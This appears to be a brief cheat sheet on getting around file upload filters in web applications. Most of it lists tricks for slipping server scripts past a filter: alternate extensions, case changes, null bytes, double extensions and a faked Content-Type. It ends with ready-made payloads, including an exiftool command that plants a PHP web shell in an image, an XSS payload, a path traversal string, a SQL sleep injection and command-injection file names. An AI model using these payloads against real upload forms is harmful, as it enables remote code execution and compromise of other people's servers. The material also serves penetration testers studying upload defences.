BOOK THIS SPACE FOR AD
ARTICLE ADName:
1. Use Alternate extensions:
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module, phps, phpt, phtml, phtmSP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml, .asa(IIS <= 7.5), .aspx;1.jpg # (IIS < 7.0)sp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .actionColdfusion: .cfm, .cfml, .cfc, .dbmFlash: .swfPerl: .pl, .cgi, .pm, .libErlang Yaws Web Server: .yawsPerl: .pl, .pm, .cgi, .libColdfusion: .cfm, .cfml, .cfc, .dbm2. Random capitalization: PhP, pHp, …
3. Adding special characters before or after the extension ( brute force with Burp ) :
%20%0a%00%0d/\.….….;./.\\x00file.php123png4. Break limit: AA….AAA.php.png
5. Duplicate extension:
file.php.png.jpgfile.php%00.pngContent-Type:
Change from Content-type: application/x-php to Content-type: image/jpegMore: https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txtMagic byte:
List of file signature: https://en.wikipedia.org/wiki/List_of_file_signatures
Exif:
exiftool -Comment=’<?php system($_REQUEST[‘cmd’]); ?>’ test.png
XSS:
<svg onload=alert(document.domain)>
Path Traversal
../../../file.png
SQLi
sleep(10) — -.jpg
RCE
a`whoami`z.jpg
a$(whoami)x.jpg
a;sleep 30;z.jpg